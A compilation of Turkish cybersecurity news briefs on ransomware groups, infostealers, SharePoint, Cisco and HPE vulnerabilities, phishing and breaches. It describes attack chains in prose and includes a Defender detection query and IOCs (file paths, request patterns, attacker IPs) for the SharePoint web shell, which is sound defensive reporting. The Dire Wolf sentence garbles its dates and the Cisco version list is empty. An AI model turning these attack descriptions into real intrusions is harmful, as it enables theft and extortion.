Eylül 2024’te ortaya çıkan Interlock fidye yazılımı grubu, kısa sürede küresel çapta birçok sektöre saldırı düzenledi. Sağlık hizmetleri, grubun en sık hedef aldığı alanların başında geliyor.

Geçtiğimiz haftalarda Interlock grubu, böbrek sağlığı alanında hizmet veren Fortune 500 şirketi DaVita’nın sistemlerinden 1,5 terabayt veri çaldığını ve sızdırdığını duyurdu. Grup ayrıca 120'den fazla sağlık merkezi bulunan Kettering Health sistemlerine de sızdığını açıkladı.

Olağandışı sızma yöntemleri
FBI’ın yaptığı teknik analizlere göre, Interlock aktörleri genellikle zararlı yazılımı, kötü niyetli bağlantılar içeren yasal görünümlü internet siteleri aracılığıyla yayıyor. Bu “drive-by download” yöntemi, fidye yazılımı grupları arasında nadir rastlanan bir erişim tekniği olarak dikkat çekiyor.

Saldırganlar, hedef sistemlere erişim sağladıktan sonra hem verileri şifreliyor hem de öncesinde dışarı aktarılan dosyalarla çifte şantaj yapıyor. Kurbanlar, hem verilerin geri yüklenmesi hem de ifşa edilmemesi için fidye ödemeye zorlanıyor.

Yeni sosyal mühendislik tekniği: FileFix
Interlock grubu, bu ay itibarıyla yeni bir sosyal mühendislik tekniği olan FileFix yöntemini de kullanmaya başladı. Bu yöntemde, Windows Dosya Gezgini ve HTML uygulamaları (.HTA) gibi güvenilir arayüz öğeleri kullanılarak kurbanların hiçbir güvenlik uyarısı almadan zararlı PowerShell ya da JavaScript kodlarını çalıştırmaları sağlanıyor.

Alınması gereken önlemler
CISA ve FBI, kurumların aşağıdaki adımları uygulayarak Interlock tehdidine karşı savunmalarını güçlendirmesi gerektiğini belirtiyor:

• DNS filtreleme ve web erişim güvenlik duvarlarının etkinleştirilmesi

• Sosyal mühendislik saldırılarına karşı çalışanların eğitilmesi

• Sistem, yazılım ve donanım yazılımlarının güncel tutulması

• Ağ segmentasyonu yapılarak erişim sınırlandırılması

• Kimlik ve erişim yönetimi politikalarının oluşturulması

• Çok faktörlü kimlik doğrulamanın (MFA) tüm servislerde zorunlu hale getirilmesi

Kaynak: CUMHA - CUMHUR HABER AJANSI

Microsoft UIA, erişilebilirlik ihtiyaçları için geliştirilmiş bir API sistemi olarak yazılımların arayüz bileşenlerine dışarıdan erişim sağlamaya yarıyor. Uygulamaların arayüz elemanlarını gezmek, özelliklerini okumak ve bu elemanlarla etkileşime geçmek için kullanılan sistem, siber saldırganların da ilgisini çekiyor.

Gerçek saldırılar Şubat 2025’te başladı
Akamai tarafından yapılan açıklamaya göre, söz konusu tekniğin kötüye kullanılabileceği uyarısı Aralık 2024’te yapılmıştı. Ancak Şubat 2025 itibarıyla bu yöntemin zararlı yazılımlar tarafından sahada kullanıldığı ilk kez gözlemlendi.

Coyote zararlısının gelişimi
İlk kez Şubat 2024’te belgelenen Coyote, ağırlıklı olarak Brezilya merkezli bankacılık uygulamalarını hedef alıyor. Zararlı yazılımın önceki sürümleri keylogger ve sahte giriş ekranı gibi yöntemlerle veri toplamaktaydı.

Yeni varyantta ise sabit hedefli uygulamalarda geleneksel yöntemler kullanılmaya devam ederken, web tarayıcısı üzerinden erişilen hizmetlerde UIA sistemi devreye giriyor.

Tarayıcı penceresi üzerinden adres tespiti
Coyote, kullanıcı bir bankacılık ya da kripto hizmetini tarayıcıda açtığında, pencere başlığı üzerinden tanımlama yapamazsa UIA aracılığıyla adres çubuğu veya sekme içeriğini okuyarak hedef siteyi tespit ediyor.

Elde edilen bilgiler, önceden tanımlanmış 75 hizmetlik bir liste ile karşılaştırılıyor. Bu listede Banco do Brasil, CaixaBank, Banco Bradesco, Santander, Sicredi, Binance, Electrum ve Foxbit gibi finansal kurumlar yer alıyor.

Kimlik bilgisi hırsızlığına zemin hazırlanıyor
Şu anda yalnızca keşif aşamasında kullanılan bu yöntemle ilgili olarak, Akamai araştırmacıları UIA'nın kullanıcı tarafından girilen verileri (örneğin kullanıcı adı ve şifre) çalmak için nasıl kullanılabileceğini gösteren bir kavramsal kanıt (PoC) da yayımladı.

Microsoft henüz açıklama yapmadı
Microsoft’un UIA sistemi için herhangi bir güvenlik önlemi getirip getirmeyeceği belirsizliğini koruyor. Şirketle yapılan iletişim girişimlerine henüz yanıt alınamadı.

Uzmanlar, Android ekosisteminde de benzer şekilde Erişilebilirlik Hizmetlerinin uzun yıllardır zararlı yazılımlar tarafından istismar edildiğine dikkat çekiyor. Google, bu konuda çeşitli güvenlik önlemleri geliştirmişti.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Yazılım hizmet olarak sunulan bir modelle (Malware-as-a-Service - MaaS) dağıtılan Lumma, operasyon sonrasında tamamen kapanmasa da büyük bir kesintiye uğramıştı. Haziran ayı başında yapılan analizler, Lumma faaliyetlerinin durduğunu değil, sadece yavaşladığını ortaya koydu.

Lumma'nın yöneticileri, XSS forumları üzerinden yaptıkları açıklamada merkezi sunucularının ele geçirilmediğini, ancak uzaktan silindiğini belirtti. Aynı mesajda, yeniden yapılanma sürecinin başladığı duyuruldu.

Siber suç çevresinde yeniden güven kazandı
Trend Micro tarafından yayımlanan son rapora göre, Lumma zararlı yazılımı operasyonları neredeyse eski yoğunluğuna ulaştı. Şirketin ağ telemetrisi verileri, zararlı altyapının birkaç hafta içinde yeniden etkin hale getirildiğini gösteriyor.

Raporda, "Lumma Stealer ve ilişkili altyapıya yönelik kolluk kuvveti müdahalesinin ardından, Lumma'nın operasyonlarında açık bir yeniden yapılanma süreci gözlemlendi" ifadeleri yer aldı.

Yeni altyapı ve farklı sağlayıcılar
Lumma, geçmişte olduğu gibi yine yasal bulut altyapılarını kötüye kullanarak trafiğini gizlemeye devam ediyor. Ancak artık Cloudflare yerine, genellikle Rusya merkezli Selectel gibi alternatif sağlayıcılara yönelmiş durumda.

Dört farklı bulaşma yöntemi
Trend Micro uzmanları, Lumma’nın şu anda dört ana dağıtım kanalı üzerinden bulaşma gerçekleştirdiğini belirtiyor:

• Sahte yazılım kırma araçları ve keygen’ler: Manipüle edilmiş arama sonuçları ve sahte reklamlarla kullanıcılar, sistem bilgilerini toplayan TDS (Traffic Detection Systems) tabanlı sahte sitelere yönlendiriliyor. Ardından Lumma indiricisi sunuluyor.

• ClickFix yöntemi: Ele geçirilmiş sitelerde gösterilen sahte CAPTCHA sayfaları, kullanıcıyı PowerShell komutları çalıştırmaya yönlendiriyor. Lumma doğrudan belleğe yüklenerek tespit edilmekten kaçınıyor.

• GitHub üzerinden dağıtım: Yapay zekâ ile üretilmiş içeriklerle hazırlanan sahte oyun hileleri tanıtılıyor. Bu GitHub depolarında, genellikle "TempSpoofer.exe" gibi zararlı dosyalar barındırılıyor.

• YouTube ve Facebook: Sahte yazılımları tanıtan videolar ve paylaşımlar, kullanıcıları dış bağlantılara yönlendirerek Lumma’nın yüklendiği sitelere ulaştırıyor. Bu siteler, güvenilir platformlara benzemesi için genellikle sites.google.com gibi hizmetleri kullanıyor.

Uzmanlara göre baskınlar yeterli değil
Trend Micro’nun değerlendirmesine göre, Lumma örneğinde olduğu gibi yalnızca dijital altyapıya yapılan müdahaleler, yazılım geliştiricilerini durdurmaya yetmiyor. Herhangi bir gözaltı ya da dava süreci olmaksızın yapılan operasyonlar, bu tür tehdit aktörleri tarafından geçici bir engel olarak görülüyor.

Kaynak: CUMHA - CUMHUR HABER AJANSI

“IT Destek” Kılığında Saldırıyorlar! Matanbuchus 3.0 ile Microsoft Teams Üzerinden Siber Sızma!

Yeni keşfedilen Matanbuchus 3.0 zararlısı, Microsoft Teams üzerinden sahte IT destek çağrılarıyla sistemlere sızıyor. Sosyal mühendislik teknikleriyle kullanıcıları kandıran saldırganlar, zararlı yazılımı sistemlere hiçbir antivirüs uyarısı olmadan yerleştirmeyi başarıyor.

Matanbuchus Loader’ın 3. sürümü, Quick Assist ve dosya paylaşımı yoluyla sisteme sızıyor. Ardından zararlı bir libcurl.dll dosyası, GenericUpdater.exe üzerinden çalıştırılıyor. Bu yöntem “DLL Sideloading” olarak biliniyor ve güvenliğe takılmadan çalışabiliyor.

• Microsoft Teams üzerinden sahte bir “IT Destek” araması yapılır
• Kullanıcıdan Quick Assist açması istenir
• “GenericUpdater.exe” dosyası gönderilir
• libcurl.dll üzerinden Matanbuchus belleğe enjekte edilir
• Arka planda sistem taraması başlar

Bu saldırılar şu an aktif olarak Avrupa, ABD ve Türkiye gibi ülkelerdeki şirketleri hedef alıyor. Özellikle Microsoft Teams kullanan kurumlar, devlet yapıları ve uzaktan çalışanlar tehdit altında.

• Diskte iz bırakmadan sadece RAM’de çalışır
• EDR atlatır – dolaylı sistem çağrıları kullanır
• Sistem konfigürasyonunu MurmurHash3 ve Salsa20 ile şifreli saklar
• Skype trafiği gibi davranarak C2 sunucusuna veri gönderir
• PowerShell, CMD, MSI installer ve WMI gibi yöntemlerle farklı şekillerde tetiklenebilir

• Teams çağrılarını kimden geldiğine bakmadan kabul etmeyin
• Quick Assist isteklerini reddedin, teyitsiz bağlantı kurmayın
• “GenericUpdater.exe” gibi belirsiz dosyaları çalıştırmayın
• EDR sistemlerinizi güncel tutun, davranışsal analiz desteği olan çözümler kullanın
• PowerShell ve CMD komutlarına kısıtlama getirin

Unutmayın: Güvenli görünen araçlar (Teams, Quick Assist) bile saldırganlar tarafından suistimal edilebilir. Her çağrıya ve dosyaya şüpheyle yaklaşın. Bu saldırı şimdi aktif. Tehdit kapınızda olabilir!

Kaynak: CUMHA - CUMHUR HABER AJANSI

Microsoft, SharePoint yazılımında tespit edilen ve dünya genelinde aktif olarak kötüye kullanılan iki sıfır gün (zero-day) açığı için acil güvenlik güncellemeleri yayınladı. Açıklar, CVE-2025-53770 ve CVE-2025-53771 kodlarıyla takip ediliyor.

ToolShell Saldırı Zinciri ve Pwn2Own Yarışması

Mayıs ayında Berlin'de düzenlenen Pwn2Own güvenlik yarışmasında araştırmacılar, "ToolShell" olarak adlandırılan bir güvenlik zafiyeti zinciri aracılığıyla Microsoft SharePoint üzerinde uzaktan kod çalıştırma (RCE) gerçekleştirmeyi başarmıştı.

Bu zafiyetler Temmuz ayındaki Patch Tuesday kapsamında yamalanmış olsa da, saldırganlar bu güncellemeleri atlatan yeni açıklar keşfetti. Şu ana kadar dünya genelinde en az 54 kurum bu saldırılardan etkilenmiş durumda.

Yayınlanan Güncellemeler

Microsoft, SharePoint Subscription Edition ve SharePoint Server 2019 için CVE-2025-53770 ve CVE-2025-53771 açıklarını gideren acil yamaları paylaştı. SharePoint Server 2016 için ise yamaların henüz hazır olmadığı bildirildi.

• SharePoint Server 2019: KB5002754
• SharePoint Subscription Edition: KB5002768

Makine Anahtarlarının Döndürülmesi Gerekiyor

Güncellemeden sonra SharePoint sistemlerindeki makine anahtarlarının döndürülmesi öneriliyor. Bu işlem iki şekilde yapılabiliyor:

1. PowerShell ile: Update-SPMachineKey
2. Merkezi Yönetim Arayüzü: Central Administration → Monitoring → Review job definition → Machine Key Rotation Job → Run Now

İşlem sonrası tüm SharePoint sunucularında iisreset.exe komutu ile IIS yeniden başlatılmalı.

Kötü Amaçlı Dosya Belirtileri Kontrol Edilmeli

Microsoft, sistemlerde saldırıya işaret edebilecek dosya ve log girdilerinin incelenmesini öneriyor. Aşağıdaki bulgulara dikkat edilmelidir:

• C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\16\TEMPLATE\LAYOUTS\spinstall0.aspx adlı dosyanın varlığı
• ToolPane.aspx dosyasına yapılan POST istekleri
• SignOut.aspx referanslı HTTP log girdileri

Defender ile Tespit Sorgusu:

DeviceFileEvents
| where FolderPath has "MICROS~1\\WEBSER~1\\16\\TEMPLATE\\LAYOUTS"
| where FileName =~ "spinstall0.aspx"
   or FileName has "spinstall0"
| project Timestamp, DeviceName, InitiatingProcessFileName, InitiatingProcessCommandLine,
          FileName, FolderPath, ReportId, ActionType, SHA256
| order by Timestamp desc
    

Eğer dosya tespit edilirse, etkilenen sunucuda ve bağlı sistemlerde geniş çaplı bir güvenlik analizi yapılması gerekmektedir.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Mayıs 2025’te siber güvenlik uzmanlarının keşfettiği Dire Wolf fidye yazılımı grubu, şimdiden 11 ülkede 16 kurumu hedef aldı. Grup, kurbanlarına özel notlar bırakıp kişisel iletişim kurarak ortalama 500 bin dolarlık fidyeler talep ediyor.

Grup ilk kez Mayıs 2025Haziran-Temmuz 2025 arasında Türkiye'den kaynaklandı.

Saldırılar; ABD, Tayland, Türkiye gibi toplam 11 ülkeyi kapsıyor. En çok hedef alınan sektörler ise teknoloji ve üretim alanında faaliyet gösteren şirketler.

Dire Wolf, double extortion yani çifte sömürü yöntemi kullanıyor. Verileri hem şifreliyor hem de çalıyor. Saldırılarında şu teknikleri uyguluyor:

• Golang ile yazılmış fidye yazılımı
• UPX ile paketlenmiş, analizi zor
• Curve25519 + ChaCha20 şifreleme
• 75 sistem servis ve 59 uygulamayı durdurma
• Antivirüsleri etkisizleştirme (Sophos, Symantec, vb.)
• Windows loglarını ve geri yükleme noktalarını silme

Dire Wolf’un amacı sadece para kazanmak. Grup herhangi bir politik mesaj vermiyor. Yüksek fidye talepleriyle "az ama öz saldırı" stratejisi izliyor. Uzmanlara göre bu taktik, İsrail’in nokta atışı operasyonlarına benzer biçimde profesyonelce yürütülüyor.

Grubun kimliği henüz bilinmiyor. Ancak kurbanlara özel yazışmalar yapmaları, ileri düzey sosyal mühendislik bilgisine sahip olduklarını gösteriyor. Her kuruma özel notlar ve doğrudan iletişim kanalları oluşturuluyor.

 Kurumlar Ne Yapmalı?

• Yedekleri offline ortamda saklayın
• Antivirüs sistemlerini güncel tutun
• Şüpheli e-postalara karşı personeli eğitin
• Sistem loglarını izleyin
• Geri yükleme noktalarını koruyun

Kaynak: CUMHA - CUMHUR HABER AJANSI

CVE-2025-37103 olarak takip edilen bu açık, ürünlerde sabitlenmiş (hardcoded) yönetici giriş bilgilerinin bulunduğunu ortaya koyuyor. HPE tarafından yayımlanan güvenlik bültenine göre, saldırganlar bu bilgiler aracılığıyla kimlik doğrulama süreçlerini atlayabiliyor ve cihazların web arayüzüne yönetici olarak erişebiliyor.

Açığın etkililik seviyesi kritik olarak tanımlandı ve CVSS v3.1 puanı 9.8 olarak belirlendi. Zafiyet, 3.2.0.1 ve daha eski sürüm yazılımları çalıştıran Instant On Access Point modellerini etkiliyor.

HPE bülteninde şu ifadeye yer verdi:
“Yazılıma gömülü giriş bilgilerinin varlığı, cihazlara kimlik doğrulama olmaksızın erişim sağlanmasına yol açmaktadır. Bu da uzaktaki bir saldırganın sistemi yönetici yetkileriyle kontrol etmesine imkan tanır.”

Bu zafiyetin keşfi, Ubisectech Sirius Team üyesi ve ZZ takma adını kullanan bir güvenlik araştırmacısı tarafından gerçekleştirildi. Araştırmacı bulgularını doğrudan HPE’ye bildirdi.

Saldırganların yönetici erişimi elde ettikten sonra erişim noktası ayarlarını değiştirebileceği, güvenlik yapılandırmalarını etkileyebileceği, arka kapılar kurabileceği, ağ trafiğini izleyerek gizli dinleme yapabileceği veya daha ileri sistemlere sızabileceği ifade ediliyor.

İkinci açık CLI üzerinden komut enjeksiyonuna izin veriyor
Aynı güvenlik bülteninde, HPE tarafından CVE-2025-37102 koduyla bildirilen ikinci bir zafiyet daha yer aldı. Bu açık, Aruba Instant On cihazlarının komut satırı arayüzünde (CLI) bulunan ve kimlik doğrulaması gerektiren yüksek seviyede tehlikeli bir komut enjeksiyonu zafiyetine işaret ediyor.

Uzmanlara göre, bu açık birinci zafiyetle zincirleme kullanılabilir. Yani saldırganlar önce sabitlenmiş bilgilerle yönetici erişimi elde edip, ardından CLI üzerinden zararlı komutlar yürütebilir. Bu durum veri sızdırma, güvenlik bileşenlerini devre dışı bırakma ve kalıcı erişim sağlama gibi sonuçlara yol açabilir.

Her iki zafiyetin çözümü için, cihazların 3.2.1.0 veya daha yeni bir yazılım sürümüne güncellenmesi gerektiği belirtildi. HPE, herhangi bir geçici çözüm sunmadı.

Şirket, şu ana kadar bu açıklardan yararlanıldığına dair herhangi bir kötüye kullanım bildirimi almadığını ifade etti. Ancak, durumun hızla değişebileceği ve güvenlik yamalarının derhal uygulanmasının önem taşıdığı vurgulandı.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Söz konusu zafiyet, daha önce Pwn2Own Berlin 2025 etkinliğinde gösterilen ve "ToolShell" olarak adlandırılan saldırı zincirinin bir varyantı olarak değerlendiriliyor. Orijinal zincirde yer alan CVE-2025-49706 ve CVE-2025-49704 kodlu açıklıklar Temmuz yamasıyla kapatılmış olsa da, benzer bir teknikle çalışan yeni açık tespit edildi.

Microsoft’un açıklamasına göre, saldırganlar bu zafiyet yoluyla sunucuya bir .aspx dosyası yükleyerek uzaktan kod çalıştırma (RCE) gerçekleştirebiliyor. Bu işlem sırasında, SharePoint sunucusuna ait kriptografik anahtarlar ele geçirilerek sistem üzerinde yetkili işlemler yapılabiliyor.

85'ten fazla sunucu tehlikede, 29 kurum etkilendi
Saldırı ilk olarak Hollanda merkezli siber güvenlik firması Eye Security tarafından 18 Temmuz’da fark edildi. Firmanın açıklamasına göre, saldırılarda “spinstall0.aspx” adlı zararlı bir dosya kullanılarak SharePoint sunucularının yapılandırma dosyalarındaki ValidationKey ve DecryptionKey bilgileri sızdırılıyor.

Eye Security CTO’su Piet Kerkhofs, saldırıların dünya çapında 85'ten fazla sunucuyu etkilediğini, yapılan kümeleme çalışmaları sonucunda ise 29 kurumun doğrudan hedef alındığını açıkladı. Bu kurumlar arasında çok uluslu şirketler ve devlet kurumları da bulunuyor.

Henüz yama yok, geçici önlem önerileri
Microsoft, açığa yönelik resmi bir güvenlik yaması yayımlanmadığını belirtti. Geçici önlem olarak, AMSI (Antimalware Scan Interface) entegrasyonunun aktif hale getirilmesi ve tüm SharePoint sunucularında Defender Antivirus kurulmasının önerildiği bildirildi.

Bu özellik, Eylül 2023’ten itibaren yayımlanan güvenlik güncellemeleriyle varsayılan olarak etkinleştirilmiş durumda. Ancak manuel kurulum yapan ya da güncelleme almayan sistemlerde etkin olmayabileceği belirtiliyor. Microsoft, AMSI etkinleştirilemeyen sistemlerin internet bağlantısının kesilmesini tavsiye ediyor.

İhlal tespit yöntemleri ve göstergeleri
Microsoft ve Eye Security, saldırıya uğrayan sistemleri tespit edebilmek için aşağıdaki Göstergeleri (IOC) paylaştı:

• C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\16\TEMPLATE\LAYOUTS\spinstall0.aspx dosyasının varlığı

• IIS loglarında /_layouts/15/ToolPane.aspx adresine POST isteği yapılması

• HTTP Referer bilgisinin /_layouts/SignOut.aspx olması

• Şu IP adreslerinden gelen bağlantılar: 107.191.58.76, 104.238.159.149, 96.9.125.147

Bu belirtilere rastlanan sistemlerin derhal ağ bağlantısının kesilmesi, sistemlerin çevrimdışı alınması ve kapsamlı güvenlik analizleri yapılması gerektiği vurgulandı.

Uzmanlar, bazı güvenlik duvarlarının bu saldırıları durdurabildiğini belirtse de, imza tabanlı korumanın aşılması halinde yayılımın artabileceğine dikkat çekiyor.

Kaynak: CUMHA - CUMHUR HABER AJANSI

İlk olarak 2024’ün sonlarında fark edilen bu yöntem, 2025 ortalarında çok sayıda ülkede gözlemlenmeye başladı. Özellikle ABD, Avrupa ve Türkiye'deki bazı kurumlara yönelik kampanyalarda bu yöntem kullanıldı.

Saldırıların ana hedefinde:

• Şirket çalışanları
• Kurumsal e-posta kullanıcıları
• İnsan kaynakları ve muhasebe departmanları

bulunuyor. Ancak bu yöntem, genel kullanıcıları da tuzağa düşürebilecek kadar etkili.

Saldırganlar profesyonel olarak hazırlanmış PDF dosyalarının son sayfasına bir zararlı QR kod yerleştiriyor. Bu kod:

• Google, YouTube gibi güvenilir siteler üzerinden yönlendirme yaparak güven kazanıyor.
• Kullanıcıyı sahte giriş ekranlarına götürüyor ve e-posta/şifre bilgilerini çalıyor.
• Güvenlik test araçları (Selenium, Burp Suite vb.) tespit edildiğinde, analizleri engellemek için about:blank sayfasına yönlendiriyor.

Bu saldırı, klasik phishing yöntemlerinden çok daha sofistike:

• Güvenlik yazılımlarının çoğu ilk sayfayı taradığı için bu saldırı kolayca gözden kaçabiliyor.
• PDF belgeleri resmi göründüğü için insanlar QR kodları gönül rahatlığıyla tarayabiliyor.
• Güvenli servisler üzerinden yapılan yönlendirmeler güven algısını artırıyor.

Uzmanlar, bu tür saldırıların daha da yaygınlaşabileceği konusunda uyarıyor. Kurumların çalışanlarına QR kod okutmadan önce içeriğin doğruluğunu sorgulama eğitimi vermesi gerektiğini vurguluyorlar.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Wagenius, Texas’ta 20 Aralık 2024’te gözaltına alınmış, gizli telefon kayıtlarının izinsiz aktarımı suçlamasıyla Washington Batı Bölgesi Mahkemesi’nde yargılanmaya başlamıştı. 2025 Şubat ayında ise AT&T ve Verizon’a yönelik hack eylemleriyle ilgili olarak da suçlu bulunmuştu.

Siber takma adlarla faaliyet yürüttü
Adalet Bakanlığı’na göre Wagenius, “kiberphant0m”, “cyb3rph4nt0m” ve “buttholio” gibi takma adlarla yeraltı siber forumlarında aktifti. 2023 Nisan – 2024 Aralık tarihleri arasında, diğer kişilerle birlikte çalışarak kurumlara ait sistem giriş bilgilerini ele geçirdi ve bu şirketlere ait verileri sızdırmakla tehdit ederek 500 bin ila 1 milyon dolar arasında fidye talep etti.

Elde edilen bilgilere göre, ekip Telegram üzerinden organize oldu, çalınan parolaları paylaştı ve “SSH Brute” adlı özel bir saldırı aracıyla sistemlere erişim sağladı.

Ayrıca SIM kart kopyalama (SIM-swapping) yöntemleriyle de kullanıcı hesaplarına ulaşıldığı, çalınan verilerin bir kısmının çeşitli siber suç forumlarında satıldığı veya dolandırıcılık faaliyetlerinde kullanıldığı tespit edildi.

Fidye talepleri ve veri sızdırma tehditleri
Wagenius, mağdurlardan birine gönderdiği mesajda, 358 GB’lik veri sızıntısı tehdidinde bulunarak iletişime geçilmesini ve ödeme yapılmasını talep etti. Bir başka şirkete gönderdiği e-postada ise 500 bin dolar değerinde kripto para karşılığında verilerin sızdırılmayacağını belirtti.

Yetkililer, Wagenius’un bu faaliyetleri aktif görevdeyken, ABD Ordusu mensubu olarak gerçekleştirdiğini ve bu durumun davanın ağırlığını artırdığını ifade etti.

Ceza ekim ayında belli olacak
Wagenius hakkında hazırlanan son iddianamede, bilişim dolandırıcılığına yönelik komplolar, ağır kimlik hırsızlığı ve şantaj suçlamaları yer alıyor. Kabul edilen tüm suçlamalar sonucunda en fazla 27 yıl hapis cezası öngörülüyor.

Mahkeme, daha önce telefon kayıtlarının yasa dışı aktarımı suçundan kabul edilen suçlar için de ek ceza verip vermeyeceğini 6 Ekim 2025’te açıklayacak.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Birleşik Krallık merkezli perakende zinciri Co-op (Co-operative Group), Nisan ayında gerçekleşen siber saldırı sonucu 6,5 milyon üyeye ait kişisel verilerin çalındığını resmen duyurdu. Şirket CEO’su Shirine Khoury-Haq, BBC Breakfast programında yaptığı açıklamada, saldırganların tüm üye verilerine erişip kopyaladığını ifade etti.

“Veriler kopyalandı ve saldırganlar bunlara erişim sağladı. Bu durum, diğer kuruluşlarda yaşanan siber saldırılarla aynı şekilde işledi. Bu, maalesef olayın en korkunç yanı,” dedi Khoury-Haq.

Şirket, herhangi bir finansal bilgi veya işlem verisinin sızdırılmadığını belirtse de, üyelerin iletişim bilgilerinin saldırganların eline geçtiği doğrulandı.

Saldırı zinciri: Sosyal mühendislik ve parola resetleme
Saldırının 22 Nisan 2025 tarihinde başladığı, tehdit aktörlerinin bir Co-op çalışanını hedef alan sosyal mühendislik yöntemiyle sisteme giriş yaptığı öğrenildi. Parolayı sıfırlayarak sisteme erişim sağlayan saldırganlar, daha sonra şirketin Windows Active Directory veritabanı olan NTDS.dit dosyasını ele geçirdi. Bu dosya, sistemdeki kullanıcı hesaplarının parola özetlerini içeriyor ve çevrimdışı şekilde kırılarak tüm ağa yayılmayı mümkün kılıyor.

DragonForce fidye yazılımı ve Scattered Spider bağlantısı
Saldırının ardından şirket birçok BT sistemini çevrimdışı hale getirmek zorunda kaldı. Yapılan ilk açıklamalarda olay "girişim niteliğinde" değerlendirilmişti. Ancak sonrasında önemli miktarda verinin sızdırıldığı doğrulandı. Siber güvenlik kaynakları, saldırının Marks & Spencer’a yapılan ve DragonForce fidye yazılımı kullanılan saldırıyla benzerlik gösterdiğini, saldırıların arkasında Scattered Spider adlı grupla bağlantılı tehdit aktörlerinin olduğunu bildirdi.

BBC, fidye yazılımı operatörü DragonForce ile iletişime geçtiklerini ve saldırının bir ortağı tarafından gerçekleştirildiğinin doğrulandığını aktardı. DragonForce, BBC ile Co-op’a ait bazı veri örneklerini de paylaştı.

NCA dört kişiyi gözaltına aldı
İngiltere Ulusal Suç Teşkilatı (NCA), Co-op ve Marks & Spencer saldırılarıyla bağlantılı olduğundan şüphelenilen dördü genç toplam dört kişiyi geçtiğimiz hafta gözaltına aldı. Zanlılar arasında 17, 19 ve 20 yaşlarında kişilerin bulunduğu, gözaltıların Londra ve West Midlands bölgelerinde gerçekleştiği bildirildi.

Bu kişilerden birinin, 2023 yılında MGM Resorts’a yönelik gerçekleştirilen ve 100’den fazla sanal sunucunun şifrelenmesiyle sonuçlanan fidye yazılımı saldırısıyla da bağlantılı olduğu iddia ediliyor. O saldırı da yine Scattered Spider grubuyla ilişkilendirilmişti.

CEO Khoury-Haq, yaşanan veri ihlalini "kişisel bir saldırı" olarak değerlendirdi ve “Bu olay beni değil, çalışanlarımı ve üyelerimizi hedef aldı. Bu nedenle çok daha kişisel bir anlam taşıyor” dedi.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Cisco, Identity Services Engine (ISE) platformunu etkileyen ve azami kritiklik puanı olan 10 üzerinden 10 ile derecelendirilen yeni bir güvenlik açığı hakkında uyarıda bulundu. CVE-2025-20337 koduyla izlenen bu açıklık, kullanıcıdan gelen verilerin yeterince doğrulanmaması nedeniyle ortaya çıkıyor.

Zafiyet, Japonya merkezli GMO Cybersecurity by Ierae şirketinden araştırmacı Kentaro Kawane tarafından keşfedildi ve Trend Micro Zero Day Initiative (ZDI) üzerinden Cisco’ya bildirildi.

Açık, uzaktan ve kimlik doğrulaması gerekmeksizin istismar edilebiliyor. Saldırganlar, özel olarak hazırlanmış API istekleriyle sistem üzerinde zararlı dosya yükleyip keyfi komut çalıştırabiliyor ya da root yetkisi elde edebiliyor.

Etkilenen sürümler ve düzeltmeler
Zafiyet, Cisco ISE ve ISE-PIC 3.3 ve 3.4 sürümlerini etkiliyor. Daha önce bildirilen CVE-2025-20281 ve CVE-2025-20282 açıklarıyla birlikte değerlendirildiğinde, bu sürümler tümüyle risk altında bulunuyor. Cisco, bu üç kritik açığın birbirinden bağımsız şekilde istismar edilebileceğini belirtiyor.

Yalnızca aşağıdaki sürümlerde tüm kritik açıklar kapatılmış durumda:

Daha düşük seviyeli diğer açıklar da duyuruldu
Cisco ayrıca, farklı ürünlerde tespit edilen ve orta-yüksek seviyede risk taşıyan şu açıklar için de güvenlik bültenleri yayımladı:

• CVE-2025-20274: Cisco Unified Intelligence Center’da, kimliği doğrulanmış kullanıcıların root seviyesinde zararlı dosya yükleyip çalıştırabileceği bir açık.

• CVE-2025-20272: Cisco Prime Infrastructure ve EPNM sistemlerinde REST API üzerinden veri sızdırılmasına neden olabilecek SQL enjeksiyonu açığı.

• CVE-2025-20283, 20284, 20285: Cisco ISE sistemlerinde, yetkili kullanıcıların root komutları çalıştırabileceği ve IP kısıtlamalarını aşabileceği açıklıklar.

• CVE-2025-20288: Unified Intelligence Center’da kimlik doğrulaması gerektirmeyen SSRF zafiyeti.

Bu açıklar için de yamaların yayımlandığı, fakat hiçbirinde geçici önlemlerin bulunmadığı belirtildi. Cisco, yükseltme öncesinde sistem gereksinimlerinin karşılandığının test edilmesini öneriyor.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Salt Typhoon, Çin Devlet Güvenlik Bakanlığı (MSS) ile bağlantılı olduğu düşünülen ve daha önce dünya genelinde telekom altyapılarına yönelik saldırılarla adını duyuran bir grup. Grup, AT&T, Verizon, Viasat gibi birçok şirketi daha önce hedef almış ve ABD hükümetiyle bağlantılı haberleşme verilerine erişim sağlamayı amaçlamıştı.

Ağ yapılandırmaları ve kimlik bilgileri ele geçirildi
DHS’nin notuna göre, Salt Typhoon’un bu saldırıda elde ettiği veriler arasında:

• Ağ şemaları,
• Yapılandırma dosyaları,
• Sistem yöneticisi kimlik bilgileri,
• Ulusal Muhafız personeline ait kişisel bilgiler yer alıyor.

Bu bilgiler, yalnızca hedef alınan eyaletle sınırlı kalmadı. Ulusal Muhafız’ın diğer eyaletler ve en az dört ABD bölgesiyle olan veri trafiği de saldırganlar tarafından izlendi. Saldırganların, bu verileri kullanarak diğer eyalet ve federal ağlara da sızma amacı taşıdığı belirtiliyor.

DHS notunda, grubun daha önce benzer yapılandırma dosyalarını kullanarak başka devlet kurumlarında güvenlik açıklarını tespit ettiği ve yeni saldırılar gerçekleştirdiği bilgisi de yer aldı. Ocak–Mart 2024 döneminde ABD’de iki eyalet kurumundan daha benzer verilerin sızdırıldığı ifade edildi.

Saldırganlar eski güvenlik açıklarını hedef aldı
Saldırının nasıl gerçekleştiği belirtilmese de, Salt Typhoon’un daha önce şu güvenlik açıklarını istismar ettiği biliniyor:

• CVE-2018-0171: Cisco IOS Smart Install açığı
• CVE-2023-20198: Cisco IOS XE web arayüzüne yetkisiz erişim sağlayan sıfır gün açığı
• CVE-2023-20273: Cisco IOS XE’de ayrıcalık yükseltme zafiyeti
• CVE-2024-3400: Palo Alto PAN-OS’ta komut enjeksiyonu açığı

DHS, saldırılarda kullanılan bazı IP adreslerini de paylaştı:
